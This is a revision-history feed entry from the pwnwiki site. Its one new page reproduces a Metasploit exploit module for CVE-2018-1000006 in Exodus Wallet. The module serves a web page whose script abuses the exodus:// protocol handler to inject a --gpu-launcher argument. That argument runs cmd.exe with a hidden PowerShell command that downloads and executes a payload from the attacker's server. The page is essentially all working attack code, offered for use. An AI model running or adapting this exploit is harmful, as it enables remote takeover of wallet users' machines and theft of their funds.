https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-1000006_Exodus_Wallet_%28ElectronJS_Framework%29_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-15T04:36:35Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2018-1000006_Exodus_Wallet_(ElectronJS_Framework)_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1528&oldid=prev 2021-04-11T02:06:36Z

<p>Created page with &quot;==MSFEXP== &lt;pre&gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require &#039;msf/core/...&quot;</p> <p><b>New page</b></p><div>==MSFEXP==<br /> &lt;pre&gt;<br /> ##<br /> # This module requires Metasploit: https://metasploit.com/download<br /> # Current source: https://github.com/rapid7/metasploit-framework<br /> ##<br /> <br /> require 'msf/core/exploit/powershell'<br /> <br /> class MetasploitModule &lt; Msf::Exploit::Remote<br /> Rank = ManualRanking<br /> <br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Powershell<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> <br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' =&gt; 'Exodus Wallet (ElectronJS Framework) remote Code Execution',<br /> 'Description' =&gt; %q(<br /> This module exploits a Remote Code Execution vulnerability in Exodus Wallet,<br /> a vulnerability in the ElectronJS Framework protocol handler can be used to<br /> get arbitrary command execution if the user clicks on a specially crafted URL.<br /> ),<br /> 'License' =&gt; MSF_LICENSE,<br /> 'Author' =&gt;<br /> [<br /> 'Wflki', # Original exploit author<br /> 'Daniel Teixeira' # MSF module author<br /> ],<br /> 'DefaultOptions' =&gt;<br /> {<br /> 'SRVPORT' =&gt; '80',<br /> 'URIPATH' =&gt; '/',<br /> },<br /> 'References' =&gt;<br /> [<br /> [ 'EDB', '43899' ],<br /> [ 'BID', '102796' ],<br /> [ 'CVE', '2018-1000006' ],<br /> ],<br /> 'Platform' =&gt; 'win',<br /> 'Targets' =&gt;<br /> [<br /> ['PSH (Binary)', {<br /> 'Platform' =&gt; 'win',<br /> 'Arch' =&gt; [ARCH_X86, ARCH_X64]<br /> }]<br /> ],<br /> 'DefaultTarget' =&gt; 0,<br /> 'DisclosureDate' =&gt; 'Jan 25 2018'<br /> ))<br /> <br /> register_advanced_options(<br /> [<br /> OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),<br /> ], self.class<br /> )<br /> end<br /> <br /> def gen_psh(url)<br /> ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl<br /> <br /> download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))<br /> <br /> download_and_run = &quot;#{ignore_cert}#{download_string}&quot;<br /> <br /> return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)<br /> end<br /> <br /> def serve_payload(cli)<br /> data = cmd_psh_payload(payload.encoded,<br /> payload_instance.arch.first,<br /> remove_comspec: true,<br /> exec_in_place: true<br /> )<br /> <br /> print_status(&quot;Delivering Payload&quot;)<br /> send_response_html(cli, data, 'Content-Type' =&gt; 'application/octet-stream')<br /> end<br /> <br /> def serve_page(cli)<br /> psh = gen_psh(&quot;#{get_uri}payload&quot;)<br /> psh_escaped = psh.gsub(&quot;\\&quot;,&quot;\\\\\\\\&quot;).gsub(&quot;'&quot;,&quot;\\\\'&quot;)<br /> val = rand_text_alpha(5)<br /> <br /> html = %Q|&lt;html&gt;<br /> &lt;!doctype html&gt;<br /> &lt;script&gt;<br /> window.location = 'exodus://#{val}&quot; --gpu-launcher=&quot;cmd.exe /k #{psh_escaped}&quot; --#{val}='<br /> &lt;/script&gt;<br /> &lt;/html&gt;<br /> |<br /> send_response_html(cli, html)<br /> end<br /> <br /> def on_request_uri(cli, request)<br /> case request.uri<br /> when /payload$/<br /> serve_payload(cli)<br /> else<br /> serve_page(cli)<br /> end<br /> end<br /> <br /> end<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki